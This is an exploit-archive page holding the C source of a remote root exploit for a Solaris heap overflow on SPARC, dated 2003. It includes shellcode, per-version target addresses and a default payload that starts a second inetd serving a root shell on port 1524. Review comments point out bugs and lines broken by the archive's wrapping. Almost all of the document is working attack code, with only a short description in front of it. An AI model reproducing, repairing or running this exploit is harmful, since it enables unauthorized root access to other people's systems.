
sparc.c

sparc.c
Posted Jan 5, 2003
Authored by teso, scut

Remote root exploit for Solaris Napalm heap overflow - SPARC version. Tested against SunOS 5.6, 5.7, 5.8, and 5.9. Attempts to add a root shell to inetd.conf.

tags | remote, overflow, shell, root
systems | solaris
SHA-256 | 31f1d3a448b985faea7b24302d4c77d14c5872c6dedf6a8acaba2c2b9b0d7b07

/*
Remote exploit for Solaris Napalm heap overflow - SPARC version

By scut@hotmail.com,
virtualcat@xfocus.net



*************** Private copy, __DO NOT__ distribute
************************

TESO CONFIDENTIAL - SOURCE MATERIALS
The contents of these coded instructions, statements and computer
programs may not be disclosed to third parties, copied or
duplicated in
any form, in whole or in part, without the prior written permission
of
TESO Security. This includes especially the Bugtraq mailing list,
the
www.hack.co.za website and any public exploit archive.

(C) COPYRIGHT TESO Security, 2002
All Rights Reserved

****************************************************************************


This is unpublished proprietary source code of TESO Security.

bug found by scut

Tested on 2.6/7/8.


tested against: SunOS 5.6
SunOS 5.7
SunOS 5.8
SunOS 5.9

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define BUFF_LEN 8360 /* length of the request buffer; main() sends exactly this many bytes */
#define PORT 6112 /* default target port, overridable with -p */

#define NNOP 2048 /* bytes of buffer[32..] filled from NOP_bna before the shellcode is copied in */

/* getopt()'s option-argument pointer, declared by hand: <unistd.h> is never included in this file */
extern char *optarg;

/* 8-byte filler pattern repeated NNOP/8 times; NOP is its first 4 bytes and is
   placed immediately before the shellcode (see main) */
char NOP_bna[] = "\xa2\x1c\x40\x11\x20\xbf\xff\xff";
char NOP[] = "\xa2\x1c\x40\x11";

/* Working "ksh -c " shellcode for Napalm */
/* Copied byte-for-byte into buffer[32+NNOP..] by main(); the 4-byte slot at
   byte offset 88 (the 23rd entry below) is overwritten at runtime with the
   bit-negated command length, and the -c string is appended after the
   trailing "/bin/ksh -c " text. Contains no 0x00 byte, so strlen() gives its
   full length (116 bytes). */
char shellcode[]=
"\x20\xbf\xff\xff" // bn,a <shellcode-4>
"\x20\xbf\xff\xff" // bn,a <shellcode>
"\x7f\xff\xff\xff" // call <shellcode+4>
"\x92\x03\xe0\x50" // add %o7, 0x50, %o1
"\x90\x02\x60\x10" // add %o1, 0x10, %o0
"\x20\xbf\xff\xff" // bn,a
"\xff\xff\xff\xff" // Leave space for t_p
"\xe0\x02\x3f\xf0" // ld [ %o0 + -16 ], %l0
"\xa2\x80\x3f\xff" // addcc %g0, -1, %l1
"\xa0\x24\x40\x10" // sub %l1, %l0, %l0
"\xd0\x22\x3f\xf0" // st %o0, [ %o0 + -16 ]
"\xc0\x22\x3f\xfb" // clr [ %o0 + -4 ]
"\xa2\x02\x20\x09" // add %o0, 9, %l1
"\xc0\x2c\x7f\xff" // clrb [ %l1 + -1 ]
"\xe2\x23\x3f\xf4" // st %l1, [ %o0 + -12 ]
"\xa2\x04\x60\x03" // add %l1, 3, %l1
"\xc0\x2c\x7f\xff" // clrb [ %l1 + -1 ]
"\xe2\x22\x3f\xf9" // st %l1, [ %o0 + -8 ]
"\xa2\x04\x40\x10" // add %l1, %l0, %l1
"\xc0\x2c\x7f\xff" // clrb [ %l1 + -1 ]
"\x82\x10\x20\x0b" // mov 0xb, %g1
"\x91\xd0\x20\x08" // ta 8
"\xff\xff\xff\xff" // Need to put negation of the length of the cmd + 1 here (offset 88; patched by main)
"\x22\x22\x22\x22" // no comment in the original; presumably filler
"\x33\x33\x33\x33"
"\x44\x44\x44\x44"
"\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x20\x2d\x63\x20"; // "/bin/ksh -c " (ASCII)

/* Per-release address pair; one entry per supported SunOS version in sysMagic[].
   main() adds NNOP/2 + adj to retAddr and offset to retLoc before use. */
typedef struct {
unsigned int retAddr; // shellcode's entry point
unsigned int retLoc; // location to be overwritten
char desc[32]; // Description, printed by main()
} Magic;


#define NUM_PLATFORM 4 /* number of valid entries below; -t selects by index */
/* Indexed by the -t argument. NOTE(review): main() accepts -t values up to and
   including NUM_PLATFORM, so -t 4 reads one element past this array. The
   trailing ",}" is legal C and adds no entry. */
Magic sysMagic[NUM_PLATFORM] = { { 0x0002c5e8, 0xffbef97c,
"Solaris 5.6"
},
{ 0x0002ca30, 0xffbefa4c, "Solaris 5.7" },
{ 0x0002cd15, 0xeffebaec, "Solaris 5.8" },
{ 0x0002ce50, 0xffefbaec, "Solaris 5.9"
},

};

/* 48-byte trailer: filled with 0xff in main(), patched at [3], [8..11] and
   [32..35], then copied into the last 48 bytes of the request buffer. */
char dummyBlock[48];

/* Default command used when -c is not given (main sets cmdPtr = cmd).
   It writes one inetd line for "ingreslock" (port 1524, which main() probes
   to detect success) to /tmp/.x, starts a second inetd on that file and then
   deletes the file. The literal below is broken across lines by the archive's
   wrapping and will not compile as shown. */
char cmd[] = "echo \"ingreslock stream tcp nowait root
/bin/sh sh
-i\">/tmp/.x;"
"/usr/sbin/inetd -s /tmp/.x;/bin/rm -f /tmp/.x";

/*
 * Print the one-line usage summary to stdout.
 *
 * argv0: program name as invoked (argv[0]).
 *
 * Note: "-d" is shown here but is not in main()'s getopt string
 * ("h:p:c:o:t:n:a:?"), and "-p" is accepted but not shown.
 */
void usage(char* argv0)
{
	static const char *const options = "-h host (-t 0|1|2|3) (-d default) (-?)";

	printf("usage: %s %s\n", argv0, options);
}

/*
 * Print the usage line followed by the option descriptions to stdout.
 *
 * argv0: program name as invoked (argv[0]), forwarded to usage().
 *
 * Note: the text says the default system id is Solaris 8, but main()
 * initialises the id to 0, which is the "Solaris 5.6" entry of sysMagic[].
 * Option -p (port) is not described here.
 */
void help(char* argv0)
{
	static const char *const lines[] = {
		"\twhere\n",
		"\t h - Host name or ip\n",
		"\t t - System id. default is Solaris 8\n",
		"\t\t\t0 SunOS 5.6 SPARC\n",
		"\t\t\t1 SunOS 5.7 SPARC\n",
		"\t\t\t2 SunOS 5.8 SPARC\n",
		"\t\t\t3 SunOS 5.9 SPARC\n",
		"\t c - User supplied command(s) eg \"touch /tmp/AAA\", \"rm /core;rm /tmp/AAA\", etc.\n",
		"\t Default is openning a shell at port 1524 on the victim\n",
		"\t o - +/- offset from the default overwritten location\n",
		"\t n - Number of hits\n",
		"\t Default is 1\n",
		"\t Negative or zero means 1024 hits\n",
		"\t Address increasement is 4 - Increasing from the default location or the given offset\n",
		"\t a - Adjustment. Default is 0, if default doesn't work, 4 should work \n",
		"\t ? - This help\n\n",
		"\t By scut@hotmail.com\n\n",
		"\t Sett. 2002\n\n",
	};
	size_t k;

	usage(argv0);
	for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
		fputs(lines[k], stdout);
	}
}

/*
 * Entry point: parses the options, builds one BUFF_LEN-byte request in
 * `buffer`, and sends it to host:port up to nHits times, stepping retLoc
 * by 4 between sends. Unless -c was given, each iteration first tries to
 * connect to port 1524 on the host and stops when that succeeds.
 *
 * Defects visible in this function, left as written:
 *  - getopt(), close() and sleep() come from <unistd.h>, which is not
 *    included, so they are implicitly declared.
 *  - `ch` is a char compared against EOF; getopt() returns int, so the
 *    loop only terminates where char is signed.
 *  - the local `system` shadows stdlib's system() for this scope.
 *  - the -t range check uses `>` rather than `>=`, so -t 4 indexes one
 *    past the end of sysMagic[].
 *  - the length of the -c string is never checked against the space left
 *    in `buffer`; socket() in the send loop and the send() result are
 *    never checked; exit(0) is used for every error path.
 *  - several string literals are split across lines by the archive's
 *    wrapping and do not compile as shown.
 */
int main(int argc, char** argv)
{
struct sockaddr_in targetAddr; /* never zeroed; only sin_addr, sin_family and sin_port are set */
struct hostent* host;
char buffer[BUFF_LEN+1]; /* request buffer; only the first BUFF_LEN bytes are sent */
char* cmdPtr = NULL; /* command appended after the shellcode (default: cmd[]) */
int cmdLen = 0; /* ~(strlen(cmdPtr)+1), stored big-endian into the shellcode */
int shellCodeLen = 0;
int offset = 0; /* -o, rounded to a multiple of 4 */
int fire = 1; /* loop flag for the send loop */
int userCmd = 0; /* set by -c; disables the port-1524 probe */
int system = 0; /* -t index into sysMagic[]; shadows stdlib system() */
int adj = 0; /* -a, rounded to a multiple of 4, added to retAddr */
char ch; /* should be int: getopt() returns int and signals end with -1 */
int sockfd;
int bytes; /* send() result; assigned but never checked */
int i; /* send counter in units of 4 (one send per +4) */

int port = PORT;
char* hostName = NULL;
int nHits = 1;
unsigned int retLoc = 0;
unsigned int retAddr = 0;

cmdPtr = cmd;

/* NOTE(review): "d" appears in usage() but not in this option string; "p" is
   accepted here but not documented by help(). */
while((ch = getopt(argc, argv, "h:p:c:o:t:n:a:?")) != EOF)
{
switch(ch)
{
case 'h':
hostName = optarg;
break;
case 'p':
port = atoi(optarg); /* atoi(): no error reporting for non-numeric input */
break;
case 'c':
cmdPtr = optarg;
userCmd = 1;
break;
case 'o':
offset = atoi(optarg);
/* round up to a multiple of 4; for negative input this lands 4 above the
   next multiple of 4 because offset % 4 is negative */
offset = ((offset % 4) == 0 ? offset
: offset + (4 - (offset % 4)));
break;
case 't':
system = atoi(optarg);
/* BUG: should be `system >= NUM_PLATFORM`; NUM_PLATFORM itself passes and
   indexes past sysMagic[] below */
if(system < 0 || system > NUM_PLATFORM)
{
help(argv[0]);
exit(0);
}
break;
case 'n':
nHits = atoi(optarg);
if(nHits <= 0)
{
nHits = 1024;
}
break;
case 'a':
adj = atoi(optarg);
/* same rounding as -o, same behaviour for negative values */
adj = ((adj % 4) == 0 ? adj : adj + (4 - (adj % 4)));
break;
case '?':
help(argv[0]);
exit(0);
default:
usage(argv[0]);
exit(0);
}
}

if(hostName == NULL)
{
usage(argv[0]);
exit(0);
}

/* gethostbyname() does not set errno; perror() will print an unrelated message */
host = gethostbyname(hostName);
if (host == NULL)
{
perror("gethostbyname() failed");
exit(0);
}

targetAddr.sin_addr = *(struct in_addr *)host->h_addr;
targetAddr.sin_family = AF_INET;

/* 20-byte fixed header, then 'A' padding; fixed offsets are patched below */
strcpy(buffer, "AAAAAAAAAA20942094XX");

memset(buffer+20, 'A', BUFF_LEN-20);

buffer[4096+20] = 0x00;
buffer[4096+20+1] = 0x00;
buffer[4096+20+2] = 0x20;
buffer[4096+20+3] = 0x94;

// The tricky bit
buffer[4096+20+12] = 0x00;
buffer[4096+20+12+1] = 0x00;
buffer[4096+20+12+2] = 0x10;
buffer[4096+20+12+3] = 0x50;

/* buffer[32 .. 32+NNOP) <- NOP_bna repeated; last 4 bytes replaced by NOP */
for(i=0; i < NNOP; i+=8)
{
memcpy(&buffer[32+i], NOP_bna, 8);
}

memcpy(&buffer[32+NNOP-4], NOP, 4);

/* shellcode[] follows at buffer[32+NNOP]; strlen() is fine here because the
   array contains no 0x00 byte (signed/unsigned compare warning only) */
for(i=0; i < strlen(shellcode); i++)
{
buffer[32+NNOP+i] = shellcode[i];
}

cmdLen = ~(strlen(cmdPtr)+1);

/* big-endian store into the 4-byte slot at shellcode offset 88 */
buffer[32+NNOP+88] = (char) ((0xff000000 & cmdLen) >> 24);
buffer[32+NNOP+88+1] = (char) ((0x00ff0000 & cmdLen)
>> 16);
buffer[32+NNOP+88+2] = (char) ((0x0000ff00 & cmdLen) >> 8);
buffer[32+NNOP+88+3] = (char) (0x0000000ff &cmdLen ); /* extra digit in the mask; still 0xff */

shellCodeLen = strlen(shellcode);

/* NOTE(review): no bound on strlen(cmdPtr) -- a long -c string overwrites the
   bytes patched at 4096+20.. and, beyond BUFF_LEN-32-NNOP-shellCodeLen bytes,
   runs off the end of buffer[] */
for(i=0; i < strlen(cmdPtr); i++)
{
buffer[32+NNOP+shellCodeLen+i] = *(cmdPtr+i);
}

memset(dummyBlock, 0xff, 48);

// t_s
dummyBlock[3] = 0xf8;

/* NNOP/2 lands inside the NOP_bna region; adj (-a) fine-tunes it */
retAddr = sysMagic[system].retAddr + NNOP/2 + adj;

// t_p  (big-endian retAddr at dummyBlock[8..11])
dummyBlock[8] = (char) ((0xff000000 & retAddr) >>
24);
dummyBlock[9] = (char) ((0x00ff0000 & retAddr) >>
16);
dummyBlock[10] = (char) ((0x0000ff00 & retAddr) >>
8);
dummyBlock[11] = (char) (0x000000ff & retAddr);

if(userCmd)
{
printf("Exploit: User
command=\"%s\"\n", cmdPtr);
}
else
{
printf("Exploit: Open a shell on %s at port 1524
as default.\n",
hostName);
}

i = 0;
retLoc = sysMagic[system].retLoc + offset;

/* one send per iteration; i and retLoc advance by 4 each time, so the loop
   body runs nHits times (the `i > (nHits-1)*4` test below ends it) */
while(fire)
{
// Check whether port 1524 is opening
if(!userCmd)
{
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd == -1)
{
perror("socket() failed\n");
exit(0);
}
targetAddr.sin_port = htons(1524);
if( (connect(sockfd, (struct sockaddr *) &targetAddr,
sizeof(targetAddr))) == 0)
{
/* i == 0 means nothing has been sent yet: the port was open beforehand */
if(i == 0)
{
printf("%s port 1524 has
already oppened.\n", hostName);
}
else
{
printf("\n*** 'Open!
Open! ...', 'Sesame! Sesame! ...' - Succeeded!!!
***\n");
printf("host %s port
1524 has been opened. Telnet to 1524, be
careful!\n", hostName);
}
fire = 0;
}
else
{
if(i != 0)
{
printf("### Failed. ###\n\n");
}
}
close(sockfd);
}

if(i > ((nHits-1)*4))
{
fire = 0;
}

// Try to shoot
if(fire)
{
sockfd = socket(AF_INET, SOCK_STREAM, 0); /* result not checked here, unlike the probe above */
targetAddr.sin_port = htons(port);
if (connect(sockfd, (struct sockaddr *) &targetAddr,
sizeof(targetAddr)) == -1)
{
perror("couldn't connect to the server");
exit(0);
}

// t_n  (big-endian retLoc at dummyBlock[32..35])
dummyBlock[32] = (char) ((0xff000000 & retLoc) >> 24);
dummyBlock[33] = (char) ((0x00ff0000 & retLoc) >> 16);
dummyBlock[34] = (char) ((0x0000ff00 & retLoc) >> 8);
dummyBlock[35] = (char) (0x000000ff & retLoc) ;

/* destination offset is 8312, so the 48 bytes end exactly at BUFF_LEN (8360) */
memcpy(buffer+4096+20+12+4128+8+48, dummyBlock, 48);

printf("================================ Hit %d
================================\n", i/4+1);
printf("Trying %s - %s SPARC, nHits=%d\n", hostName,
sysMagic[system].desc, nHits);
printf("Loc=0x%.8x Addr=0x%.8x
Offset=0x%x Adjusted Loc=0x%.8x\n",
sysMagic[system].retLoc, sysMagic[system].retAddr, offset, retLoc);
bytes = send(sockfd, buffer, BUFF_LEN, 0); /* short writes and errors are ignored */
close(sockfd);

sleep(2); /* needs <unistd.h> */

retLoc += 4;
i += 4;
}
}
}
/* End of File */
